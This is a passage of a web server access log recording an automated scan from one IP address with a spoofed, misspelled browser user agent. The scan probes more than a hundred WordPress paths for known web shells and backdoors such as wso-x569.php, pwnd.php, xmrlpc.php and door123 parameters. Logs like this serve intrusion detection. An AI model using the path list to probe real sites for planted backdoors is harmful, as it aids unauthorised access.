AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:29 -0400] "GET /0x1949.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:29 -0400] "GET /wp-login.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:29 -0400] "GET /wp-manage0.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:30 -0400] "GET /outpull.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:30 -0400] "GET /unsets.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:31 -0400] "GET /owl22.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:31 -0400] "GET /wp-managee1.php HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:31 -0400] "GET /wp-manage1.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:32 -0400] "GET /cloud.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:32 -0400] "GET /doc.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:32 -0400] "GET /file.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:33 -0400] "GET /license.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:33 -0400] "GET /mariju.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:33 -0400] "GET /moon.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:34 -0400] "GET /sgd.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:34 -0400] "GET /webdb.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:35 -0400] "GET /wp-sigunq.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:35 -0400] "GET /wp-logout.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:35 -0400] "GET /wp-hoard.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:36 -0400] "GET /wp-blog.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:36 -0400] "GET /wzy.php?action=door123 HTTP/1.1" 301 253 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:36 -0400] "GET /top.php?action=door123 HTTP/1.1" 301 253 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:37 -0400] "GET /wp-content/plugins/WordPressCore/ HTTP/1.1" 301 264 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:37 -0400] "GET /wp-content/uploads/wpr-addons/forms/ HTTP/1.1" 301 267 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:37 -0400] "GET /wp-content/plugins/index.php?p= HTTP/1.1" 301 262 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:38 -0400] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 301 263 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:38 -0400] "GET /.tmb/mariju.php HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:38 -0400] "GET /phpmailer.lang-sv.php HTTP/1.1" 301 252 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:39 -0400] "GET /.well-known/acme-challenge/mariju.php HTTP/1.1" 301 268 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:39 -0400] "GET /.well-known/pki-validation/class_api.php HTTP/1.1" 404 - "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:39 -0400] "GET /class_api.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:40 -0400] "GET /wso-x569.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:40 -0400] "GET /wp-includes/js/500.php HTTP/1.1" 301 253 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:40 -0400] "GET /wp-includes/SimplePie/plugins.php HTTP/1.1" 301 264 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:41 -0400] "GET /wp-includes/SimplePie/plugins.php HTTP/1.1" 301 264 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:41 -0400] "GET /wp-includes/SimplePie/index.php HTTP/1.1" 301 262 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:41 -0400] "GET /wp-includes/SimplePie/file.php HTTP/1.1" 301 261 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:42 -0400] "GET /wp-includes/SimplePie/file.php HTTP/1.1" 301 261 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:42 -0400] "GET /wp-includes/sodium_compat/src/Core/Curve25519/Ge/wp_blog.php HTTP/1.1" 301 291 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:42 -0400] "GET /wp-content/themes/tflow/up.php HTTP/1.1" 301 261 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:43 -0400] "GET /wp-content/themes/wp-pridmag/up.php HTTP/1.1" 301 266 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:43 -0400] "GET /wp-content/themes/travel/issue.php HTTP/1.1" 301 265 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:44 -0400] "GET /wp-admin/maint/users.php HTTP/1.1" 301 255 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:44 -0400] "GET /wp-admin/css/colors/ectoplasm/users.php HTTP/1.1" 301 270 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:44 -0400] "GET /wp-admin/user/users.php HTTP/1.1" 301 254 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:45 -0400] "GET /cgi-bin/users.php HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:45 -0400] "GET /wp-admin/images/users.php HTTP/1.1" 301 256 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:45 -0400] "GET /.well-known/pki-validation/xmrlpc.php?p= HTTP/1.1" 404 - "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:45 -0400] "GET /wp-includes/js/tinymce/skins/lightgray/img/index.php?p= HTTP/1.1" 301 286 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:46 -0400] "GET /.well-known/acme-challenge/xmrlpc.php?p= HTTP/1.1" 301 271 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:46 -0400] "GET /wp-admin/network/xmrlpc.php?p= HTTP/1.1" 301 261 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:47 -0400] "GET /xmrlpc.php?p= HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:47 -0400] "GET /cgi-bin/xmrlpc.php?p= HTTP/1.1" 301 252 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:47 -0400] "GET /css/xmrlpc.php?p= HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:48 -0400] "GET /wp-admin/user/xmrlpc.php?p= HTTP/1.1" 301 258 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:48 -0400] "GET /img/xmrlpc.php?p= HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:48 -0400] "GET /wp-admin/css/colors/coffee/xmrlpc.php?p= HTTP/1.1" 301 271 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:49 -0400] "GET /wp-admin/images/xmrlpc.php?p= HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:49 -0400] "GET /images/xmrlpc.php?p= HTTP/1.1" 301 251 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:50 -0400] "GET /wp-admin/js/widgets/xmrlpc.php?p= HTTP/1.1" 301 264 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:50 -0400] "GET /wp-admin/css/colors/xmrlpc.php?p= HTTP/1.1" 301 264 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:50 -0400] "GET /wp-admin/includes/xmrlpc.php?p= HTTP/1.1" 301 262 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:51 -0400] "GET /wp-admin/css/colors/blue/xmrlpc.php?p= HTTP/1.1" 301 269 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:51 -0400] "GET /wp-admin/xmrlpc.php?p= HTTP/1.1" 301 253 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:52 -0400] "GET /wp-includes/Requests/about.php HTTP/1.1" 301 261 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:52 -0400] "GET /wp-content/blogs.dir/about.php HTTP/1.1" 301 261 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:52 -0400] "GET /wp-admin/images/about.php HTTP/1.1" 301 256 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:53 -0400] "GET /wp-includes/blocks/about.php HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:53 -0400] "GET /wp-includes/SimplePie/about.php HTTP/1.1" 301 262 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:53 -0400] "GET /wp-content/gallery/about.php HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:54 -0400] "GET /wp-includes/images/about.php HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:54 -0400] "GET /.well-known/pki-validation/about.php HTTP/1.1" 404 - "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:54 -0400] "GET /wp-includes/rest-api/about.php HTTP/1.1" 301 261 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:55 -0400] "GET /wp-includes/style-engine/about.php HTTP/1.1" 301 265 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:55 -0400] "GET /wp-includes/ID3/about.php HTTP/1.1" 301 256 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:55 -0400] "GET /wp-admin/css/about.php HTTP/1.1" 301 253 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:56 -0400] "GET /wp-content/about.php HTTP/1.1" 301 251 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:56 -0400] "GET /.well-known/about.php HTTP/1.1" 301 252 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:56 -0400] "GET /cgi-bin/about.php HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:57 -0400] "GET /wp-includes/about.php HTTP/1.1" 301 252 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:57 -0400] "GET /wp-admin/includes/about.php HTTP/1.1" 301 258 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:57 -0400] "GET /images/about.php HTTP/1.1" 301 247 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:58 -0400] "GET /wp-includes/block-patterns/about.php HTTP/1.1" 301 267 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:58 -0400] "GET /wp-includes/pomo/about.php HTTP/1.1" 301 257 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:58 -0400] "GET /wp-content/plugins/ HTTP/1.1" 301 250 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:59 -0400] "GET /wp-content/plugins/wp-help/ HTTP/1.1" 301 258 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:59 -0400] "GET /wp-content/uploads/ HTTP/1.1" 301 250 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:24:59 -0400] "GET /wp-content/uploads/2023/ HTTP/1.1" 301 255 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:00 -0400] "GET /wp-includes/Requests/Text/ HTTP/1.1" 301 257 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:00 -0400] "GET /wp-includes/SimplePie/ HTTP/1.1" 301 253 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; 